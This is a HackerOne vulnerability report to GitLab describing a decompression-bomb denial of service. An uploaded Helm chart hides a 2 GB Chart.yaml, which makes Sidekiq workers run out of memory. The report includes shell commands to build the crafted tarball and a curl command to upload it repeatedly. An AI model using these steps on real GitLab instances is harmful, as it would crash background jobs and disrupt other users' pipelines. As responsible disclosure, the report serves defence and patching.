Sidekiq background job DoS by uploading a malicious Helm package
HackerOne report #1766973 by luryus
on 2022-11-08, assigned to GitLab Team
:
Report | Attachments | How To Reproduce
Report
Summary
An attacker can upload a crafted tarball to a Helm package repository in a GitLab project and cause sidekiq to use too much memory and crash (get killed by OOMKiller in Linux). This is basically a trivial zip bomb attack.
In small (self-hosted) Gitlab environments, where there's only a single Sidekiq node, this will cause some background jobs to fail and their execution will get delayed. For instance, the CI pipelines of other users may get interrupted. In other words, this can cause minor denial of service.
When a Helm chart (package) file (a .tar.gz
) is uploaded, Gitlab will extract its metadata in a sidekiq background job. This is done by reading the Chart.yaml
file inside the tarball. This process lacks sufficient size checks for the files. The attacker can make the Chart.yaml file be an empty 2 gig file (more specifically 2147483647 bytes) which will become approximately 2 megabytes when zipped. This is well under the default Helm chart file limit of 5 megabytes [1]. The sidekiq job will try to read the whole 2 gigs into memory, which can cause it to go over its memory limits.
Because the attacker only needs to upload a single, small (a few megabyte) file to achieve this, it's difficult or impossible to mitigate this with rate limits. This attack can be repeated as frequently as the attacker can upload packages, and therefore the attacker can continuously cause crashes.
Compared to my previous reports (#1716296 and #1736230) where similar issues exist in Nuget package uploads and CI job parsing, this one is more limited because of a limitation in Ruby's Zlib: trying to read more than 2147483647 bytes at a time will just cause an exception to be thrown, and excessive memory use is not achieved. However, that limit is is still enough to crash a typical sidekiq instance; for example gitlab.com seems to have the "catchall" Sidekiq node memory limits set to 2.5 gigs [2] which is not enough if there are any other jobs running on the same node. The attacker can of course upload many Helm packages concurrently to cause even more memory use if a single 2 gigabyte file does not cause a crash.
Steps to reproduce
- Ensure that Helm package repository is enabled in the Gitlab instance
- Create a personal access token, if you do not already have one
- Create a new personal project.
- Craft a malicious Helm package or download the one that's attached to this report.
mkdir test touch test/Chart.yaml fallocate -l 2147483647 test/Chart.yaml tar czvf test-chart.tgz test/Chart.yaml
- Monitor the sidekiq processes in the Gitlab instance with, for example, these tools:
-
htop
for general system memory usage and processes -
tail -f path/to/sidekiq/logs
for monitoring sidekiq working (exact log file path depends on the installation) -
dmesg -T -w
for kernel logs (OOMKill logs end up here)
-
- Upload the package using curl. Change the variables according to your test environment. You can run the curl command a few times in quick succession.
TOKEN="<your personal access token>" USERNAME="<your username>" PROJECT_ID="<your project id>" GITLAB_URL="<http://your-gitlab-address>" curl -X POST --form 'chart=[@]test-chart.tgz' --user "${USERNAME}:${TOKEN}" "${GITLAB_URL}/api/v4/projects/${PROJECT_ID}/packages/helm/api/stable/charts
- Observe Sidekiq crashes due to OOMKills in Gitlab server logs
Impact
An attacker can get a sidekiq worker OOMKilled by a simple package file upload. This will interrupt any background jobs running on that particular worker. Because the attack is very simple, the attacker can do this often to continuously cause crashes.
This can affect any user in the Gitlab instance because much of Gitlab's functionality relies on sidekiq jobs. For instance, this may cause a CI pipeline to fail and be left in a "pending" state for a long time, if a background job for that pipeline was running when sidekiq crashed.
Examples
Example file test-chart.tgz
that causes the issue is attached.
I also attached a demo video where I reproduce this in my own Gitlab instance. In the video, some logs and monitoring tools are shown, in addition to the package upload commands that will cause the issue to trigger.
What is the current bug behavior?
When Gitlab processes the newly uploaded Helm package, the sidekiq job execution ends up in Packages::Helm::ExtractFileMetadataService.chart_yaml_content
. That function goes through the file entries in the package tarball, looking for Chart.yaml
. When it's found, the code proceeds to read the entire file into memory with chart_yaml.read
. No length limit parameter is given to read
so it tries to read the file to the end.
There actually is a limit here due to a bug / unintended behaviour when using Zlib::GzipReader
: if the Chart.yaml file is larger than 2147483647 bytes, the read call will throw an error. TarReader
requests the entire file size from GzipReader
, which will then try to convert the requested size to an int
in C code. That will fail for larger values. If that limitation was not present, the attacker could trigger even higher memory usage here.
What is the expected correct behavior?
The code should limit the amount of data read from the Helm Chart.yaml
file. A typical Chart.yaml
file is usually a few kilobytes at maximum and the size should never be higher than a few megabytes.
Relevant logs and/or screenshots
See the attached video file, it includes logs.
Output of checks
Not tested on Gitlab.com, but this can have at least some effect there.
Results of GitLab environment info
Docker installation:
### gitlab-rake gitlab:env:info
System information
System:
Proxy: no
Current User: git
Using RVM: no
Ruby Version: 2.7.5p203
Gem Version: 3.1.6
Bundler Version:2.3.15
Rake Version: 13.0.6
Redis Version: 6.2.7
Sidekiq Version:6.4.2
Go Version: unknown
GitLab information
Version: 15.5.2-ee
Revision: 767831e030c
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 13.6
URL: http://gl.lkoskela.com:8929
HTTP Clone URL: http://gl.lkoskela.com:8929/some-group/some-project.git
SSH Clone URL: ssh://git@gl.lkoskela.com:2224/some-group/some-project.git
Elasticsearch: no
Geo: no
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 14.12.0
Repository storage paths:
- default: /var/opt/gitlab/git-data/repositories
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
[1] https://docs.gitlab.com/ee/administration/instance_limits.html#file-size-limits
[2] https://gitlab.com/gitlab-com/gl-infra/k8s-workloads/gitlab-com/-/blob/master/releases/gitlab/values/gprd.yaml.gotmpl#L547
Impact
An attacker can get a sidekiq worker OOMKilled by a simple file upload. This will interrupt any background jobs running on that particular worker. Because the attack is very simple, the attacker can do this often to continuously cause crashes.
The severity of this depends on the sidekiq setup: with larger and more distributed instances it will of course be smaller as crashes are limited to only a subset of sidekiq instances. In small self-hosted environments though this can have a large impact on the functionality of Gitlab.
This can affect any user in the Gitlab instance because much of Gitlab's functionality relies on sidekiq jobs. Background job execution may get delayed or in some cases they may not get executed at all (if attacker can keep Sidekiq crashing continuously). For instance, this may cause a CI pipeline to fail and be left in a "pending" state for a long time, if a background job for that pipeline was running when sidekiq crashed.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: